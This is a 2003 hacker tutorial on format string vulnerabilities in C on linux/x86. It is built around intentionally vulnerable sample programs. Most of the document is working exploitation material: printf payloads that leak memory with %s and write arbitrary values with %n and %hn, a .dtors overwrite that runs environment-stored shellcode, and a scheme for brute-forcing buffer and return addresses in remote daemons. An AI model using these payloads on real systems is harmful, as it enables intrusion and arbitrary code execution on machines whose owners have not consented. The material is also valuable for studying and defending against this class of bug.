The Mystery of Format String Exploitation
Sep 12 2003, 05:50 (UTC+0)

Format strings, and how to exploit them!

rebel writes:

Over the past month I've been looking a lot into format strings and how to exploit them. While trying to learn about the subject, I noticed that there are not a lot of easy-to-understand, straightforward papers. While most hackers are skilled in the art of hacking, not all of them are very pedagogic ;). I wrote this text for people who want to learn what format strings are and how to exploit insecure code. I tried to make it easy to understand, although some things may seem tricky at first.

/*
* .: THE MYSTERY OF FORMAT STRING EXPLOITATION :.
* - written by rebel -
* 31/07/03 - 19:25:05
*/

---------------
-> NOTES
---------------
All the examples in this text are on the linux/x86 architecture, and it is assumed throughout the text that this is what we are exploiting. Format strings can still be exploited on other OSes, but it works a little differently; in particular, the shellcode is not the same.

---------------
-> REQUIREMENTS
---------------
General C knowledge and basic knowledge about how the stack works is very helpful. If you want to try the examples you'll need linux, gcc, gdb and objdump. A brain might also come in handy. So get yourself some milk & cookies and let's start.

---------------
-> WHAT ARE FORMAT STRINGS
---------------
A format string is simply a string of characters that contains special format string identifiers. If you have programmed in C you are familiar with functions such as printf(). printf() takes a format string as its first argument, followed by the variables which the format string will use. Here's an example:

#include <stdio.h>

int main(void)
{
    int x = 41705;
    printf("x = %d, x / 2 = %d.\n", x, x / 2);
    return 0;
}

This will output "x = 41705, x / 2 = 20852.". The first argument is the format string itself; it contains ordinary characters and format string identifiers. In this example the '%d' identifier was used. '%d' takes an integer as argument and prints it in decimal; here the first '%d' was replaced by x, which held the integer value 41705. There are many other format string identifiers. Some of them are %x, which is like %d but outputs in hex; %s, which takes a character pointer and prints the string until a nullbyte is encountered; and %f, which takes a floating point number.

---------------
-> FS ABUSE
---------------
Now, how can these be abused by an attacker? Try this program:

#include <stdio.h>

int main(int argc, char *argv[])
{
    printf(argv[1]);
    return 0;
}

This program simply prints its first argument, example:
- [root@knark] ~/research/paper > ./ex2 "Hello world."
Hello world.
- [root@knark] ~/research/paper >

Now, how is this program susceptible to attacks which can allow attackers to execute arbitrary code, you ask?
It's simple: printf(argv[1]) should have been written as printf("%s",argv[1]).
If the "%s" is forgotten or simply ignored, printf will look for format string identifiers in the buffer itself, in this case argv[1].
Let's try something..

- [root@knark] ~/research/paper > ./ex2 "AAAA %x %x"
AAAA 401438c8 bffffc58
- [root@knark] ~/research/paper >

Uhoh, now you can probably see what's going on. printf() recognized %x as a format string identifier, and then simply did what %x is supposed to do, print the next 4 bytes on the stack in hex. We can also print
whatever we want, from wherever we want. Try this:


#include <stdio.h>

int main(void)
{
    char secret[] = "hack.se is lame";
    char buffer[512];
    char target[512];

    printf("secret = %p\n", (void *)&secret);

    fgets(buffer, 512, stdin);
    snprintf(target, 512, buffer);
    printf("%s", target);
    return 0;
}


- [root@knark] ~/research/paper > ./ex3
secret = 0xbffffc68
AAAA%x %x %x %x %x %x %x
AAAA4013fe20 0 0 0 41414141 33313034 30326566
- [root@knark] ~/research/paper >

As you can see, format string vulnerabilities apply to all format string functions; in this example snprintf() has been misused. What we do is first give it 'AAAA', and then find out how far from $esp our buffer lies. As we can see, the fifth '%x' prints 41414141. This is the hex representation of AAAA, so our data is the fifth 4-byte argument that gets popped off the stack. So, how do we get it to print the contents of char secret[]?
Now that we know that our buffer lies 5 'pops' from $esp, we can supply an address for %s. %s takes an address as argument and prints whatever lies there until a nullbyte is found. We have to supply bffffc68 to %s, and since x86 is little endian, we have to reverse it (least significant byte first).

- [root@knark] ~/research/paper > printf "\x68\xfc\xff\xbf%%5\$s" | ./ex3
secret = 0xbffffc68
hüÿ¿hack.se is lame
- [root@knark] ~/research/paper >

Tadah! %s printed out the contents of 0xbffffc68, which was char secret[].
Ok, so now you know it's possible to print anything from anywhere using format strings, but how is that
supposed to give you a shell?

---------------
-> WRITING
---------------
There's one format string identifier which I haven't introduced yet, and it's what makes 'em great: %n. %n writes the number of bytes printed so far to the int variable whose address is passed as its argument. Try this:


#include <stdio.h>

int main(void)
{
    int x = 0;
    printf("ABCDEFG\n%n", &x);
    printf("Written bytes: %d\n", x);
    return 0;
}


- [root@knark] ~/research/paper > ./ex4
ABCDEFG
Written bytes: 8
- [root@knark] ~/research/paper >

Well well.. since "ABCDEFG\n" is 8 bytes, the value 8 gets written to the address of x. I'm sure you are beginning to see the possibilities with this.. just as we can view anything from anywhere with %s, we can write
anything to anywhere with %n. So, let's try this out, shall we?


#include <stdio.h>

int main(void)
{
    int x = 5;
    char buffer[52];
    printf("&x = %p\n", (void *)&x);
    fgets(buffer, 52, stdin);
    printf(buffer);
    printf("x = %d\n", x);
    return 0;
}


- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
test
test
x = 5
- [root@knark] ~/research/paper >

We now know that x lies at 0xbffffc74, but just like %s, %n takes an address as argument, which we must supply. Off we go to find the stackpop:

- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
AAAA%x %x %x %x %x %x %x %x %x
AAAA34 4013fe20 401217f4 8049574 8049678 0 0 41414141 25207825
x = 5
- [root@knark] ~/research/paper >

Ok, as we can see, 8 is the offset. As before, we write the format string like this:
[4 byte address]%[offset]$n
The '$' makes the identifier use the argument whose number comes before the '$', instead of the next one in line. Example:


#include <stdio.h>

int main(void)
{
    printf("%3$d %2$d %1$d.\n", 1, 2, 3);
    return 0;
}


- [root@knark] ~/research/paper > ./dollah
3 2 1.

Now, back to the %n thing. &x lies at bffffc74, let's write to it.

- [root@knark] ~/research/paper > printf "\x74\xfc\xff\xbf%%8\$n" | ./ex5
&x = 0xbffffc74
tüÿ¿x = 4
- [root@knark] ~/research/paper >

Just like it should, x gets 4 assigned to it. If we analyze our format string, we can see that the address of x, which is 4 bytes, is the only thing printed before %n. The number of bytes printed is therefore 4, and this value is written to bffffc74.

---------------
-> MKAY, ME WANT SHELL
---------------
So, how can we abuse this to execute arbitrary code? In buffer overflows we overwrite the saved return address with the address of our shellcode, thereby executing anything we want. With format strings it's a little different. You can overwrite the saved return address, but it's too much of a hassle when exploiting something locally. As I will explain later, it is however a very good option when doing remote format string attacks. The simplest way of local exploitation is to overwrite the .dtors section of the ELF binary with the address of our shellcode. The .dtors section holds memory addresses which point to machine code that is to be executed when the program ends. By default it holds nothing, but we're gonna change that.

- [root@knark] ~/research/paper > objdump -h ex5 | grep dtors
18 .dtors 00000008 08049648 08049648 00000648 2**2
- [root@knark] ~/research/paper >

From objdump we can easily find out that DTOR_LIST is at 0x08049648. DTOR_END, which is where we want to store our shellcode address, is always at DTOR_LIST+4, in this case 0x804964c. Obviously, the location of the .dtors section varies from binary to binary. Ok, now we know the address to write to, but where do we put the shellcode? The easiest way is to put it in the environment. Let's make an app that puts an egg in the env:


#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

/* NOP padding followed by code that prints "HelloKitty" and exits */
char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x13\x59\x29\xc0\xb0\x04"
    "\x29\xdb\x43\x29\xd2\xb2\x0a"
    "\xcd\x80\x29\xc0\x40\xcd\x80"
    "\xe8\xe8\xff\xff\xff"
    "HelloKitty";

int main(void)
{
    setenv("EGG", shellcode, 1);
    system("bash");
    return 0;
}


This puts an "egg" in the environment which holds some shellcode that prints "HelloKitty".
Let's move on to finding where it's located:


#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    printf("Egg address: %p\n", (void *)getenv("EGG"));
    return 0;
}


- [root@knark] ~/research/paper > ./egg
- [root@knark] ~/research/paper > ./getegg
Egg address: 0xbffffdc0
- [root@knark] ~/research/paper >

Okie dokie, we now have all the information we need to craft our very own format string. harhar! There are 2 main techniques for making a format string: one is write-1-byte-at-a-time and the other is.. you guessed it, write-2-bytes-at-a-time. How do they differ? Well, not much really. They both do the same thing, but the 2-bytes-at-a-time one can be a bit tougher on the cpu & memory, since it makes printf output far more padding. Personally it is the one I prefer. Let's make one!
destination: 804964c
content: bffffdc0
Since x86 is little endian, we write it backwards. First we want to write 0xfdc0 (2 bytes) to 804964c, then 0xbfff (2 bytes) to 804964c+2 (804964e).
Since we are using %n to write it all, we would have to print _a lot_ of characters to make the internal byte counter for %n increase that far. Putting them all in the input is not possible, since not many buffers allow storing ~65000 bytes :). We need to trick %n, and therefore we use %.u. A precision on %u, such as %.500u, pads the printed number with leading zeros, so it increases the internal byte counter without taking any real space in the buffer. For example, printf("%.500u%n\n",0,&x) would make x contain the value 500.
First we put the addresses we want to write to into the format string:

- [root@knark] ~/research/paper > printf "\x4c\x96\x04\x08\x4e\x96\x04\x08" > file

0xfdc0 = 64960

This is the first value we want to store. Since we have already written 8 bytes (the two destination addresses), we only need to pad with 64960 - 8 = 64952.
We use %hn, not %n, since %hn writes a short, which is what we're writing (short = 2 bytes).
- [root@knark] ~/research/paper > echo -n "%.64952u%8\$hn" >> file
Remember that 8 is the offset to reach our buffer in the format string.
Now we have written 64960, and want to write 0xbfff (49151). Here we run into a problem: 49151 is less than 64960, which is what we have already written. We must do a 'rollover'. Instead of writing 0xbfff we write 0x1bfff (114687); the "1" gets discarded anyway and 0xbfff is all that gets written.

already written = 64960
towrite = 114687-64960=49727
- [root@knark] ~/research/paper > echo -n "%.49727u%9\$hn" >> file
- [root@knark] ~/research/paper > cat file | ./ex5
&x = 0xbffffc44
000000000000000000....ALOT OF 0's.....
000000001075052064x = 5
HelloKitty
- [root@knark] ~/research/paper >

Tadah! The shellcode got executed, printing out "HelloKitty". As you can see, making a fully automatic local exploit is very easy, using objdump and putting the shellcode in the env. Bruteforcing the offset for %n is also easy. You give the target "AAAA%[n]$x", starting with n at 1. If the result contains "AAAA41414141" you know you've hit the jackpot.

---------------
-> REMOTE EXPLOITATION
---------------
I will not go into a full in-depth exploit example, but I will explain my preferred method of remote format string exploitation. Everything suddenly becomes much more complicated when it is a daemon we are exploiting. We cannot find the .dtors with objdump, since the binary is on a remote computer. Well, actually, we can overwrite the .dtors, but only if it is the exact same binary as one we have installed. For example, an ftpd on Redhat 9.0 would have the same .dtors address on another computer with a totally different setup, as long as it's running Redhat 9.0. What can differ is the offset for %n, but it is very easy to bruteforce. Now, what if we don't want to use crappy hardcoded targets for our exploit? What if we want to do it completely automatically, i.e. bruteforce?
What we need is:
* 'stackpop' offset for %n
* buffer address
* saved return address
The method of finding the buffer address itself isn't that complicated. We simply send:
[4 byte address]%%A%%|%[n]$s
Where address is bruteforced in a loop, starting from 0xbfffffff and working its way down, and n is the stackpop. If we receive "%%A%%" somewhere in the output, we know we've hit our buffer's address. Here's an example:


#include <stdio.h>
#include <strings.h>

int main(void)
{
    char buffer[512];

    bzero(buffer, 512);
    printf("buffer = %p.\n", (void *)buffer);
    fgets(buffer, 512, stdin);
    printf(buffer);
    return 0;
}


- [root@knark] ~/research/paper > ./ex6
buffer = 0xbffffa48.
AAAA%x %x %x %x %x %x %x %x
AAAA200 4013fe20 400124c0 40007986 40000ad8 41414141 25207825 78252078

Stackpop is 6, address of buffer is 0xbffffa48.
- [root@knark] ~/research/paper > printf "\x48\xfa\xff\xbf%%%%A%%%%|%%6\$s" | ./ex6
buffer = 0xbffffa48.
Húÿ¿%A%|Húÿ¿%%A%%|%6$s
- [root@knark] ~/research/paper >

As we can see, %s dumps what's in our buffer. We use "%%A%%" because if we receive "%%A%%" we know it has not been processed by any format string function. If it had been, we would receive "%A%", since "%%" is an escape sequence for '%' itself. When we have found our buffer address, we can easily calculate the saved return address. In this case the saved return address of main, which we want to overwrite, was pushed onto the stack first, then ebp, and then comes buffer, which is 512 bytes.
Therefore, where the saved ret is depends on the vulnerable function. sprintf(target,buffer); would make ret lie at &target + sizeof(target) + sizeof(buffer) + 4. With printf it lies at bufaddr + 512 + 4. Therefore, in this case ret lies at 0xbffffa48 + 512 + 4 = 0xbffffc4c.
As a test we overwrite it with 0x41414141, writing 0x4141 to each half: 0x4141 = 16705, and 16705 - 8 (remember, 4 byte address for %hn * 2) = 16697.

- [root@knark] ~/research/paper > printf "\x4c\xfc\xff\xbf\x4e\xfc\xff\xbf%%.16697u%%6\$hn%%7\$hn" > file
- [root@knark] ~/research/paper > cat file | ./ex6
buffer = 0xbffffa48.
Lüÿ¿Nüÿ¿00000000000...lotsa zeros..i mean lots..really lots..
0000000000Segmentation fault (core dumped)
- [root@knark] ~/research/paper > gdb ./ex6 core
GNU gdb 5.3-debian
Copyright 2002 Free Software Foundation, Inc.
Core was generated by `./ex6'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)

Chaching! We overwrote the saved return address with 0x41414141!
As you can see, remote format string exploitation can be a bit tricky, although not impossible.
I came up with a nice method for speeding up the bufaddr bruteforcing (significantly) while tinkering with an exploit. The technique goes like this: by utilizing ascii codes, we can make a sort of 'pillow' for us to land in, just like with NOPs in buffer overflows, although it's not as straightforward. We first send the 4 byte address for %s, just like normal. Then we send as many ascii characters as we can fit into the target buffer; the optimal amount is about 90. We simply start at one character, a good one being ASCII 38 ('&'). After that we move up the ascii ladder by sending ASCII 39 ('), and so on. Each character acts as an indicator of where in the buffer we have hit. So, if we start at ascii 38, the location of bufaddr is always:

[address we tried] - ([ascii of current location (for example, ASCII 42, '*')] - 38 (since we start at 38, '&')) - 4 (the address is 4 bytes).
After we stuff in our ascii chars, we put "%%A%%|%[n]$s", where n is the stackpop. With this, we can then determine if we've hit the buffer at all by doing a strstr(result,"%%A%%|");
If it does exist, we know we've hit the buffer, and can do a simple calculation of the start by analyzing the current character. Using this method we can use jumps of [frame]/2, where frame is how many ascii characters you've stuffed in the buffer.

---------------
-> BUHBYE
---------------
That's all from me, I hope you enjoyed the text and learned something. If you have any suggestions/comments you can contact me at rebel@bonbon.net. You can also catch me on irc, rebel^@EFnet and rebel@freenode.
Cheerio, tata and good luck!

greets: dvdman, dcryptr, RAk, freestyler, nebunu, ntrude, m0lted(ascii dood), xmb, norse, zarwt, q\, suspect
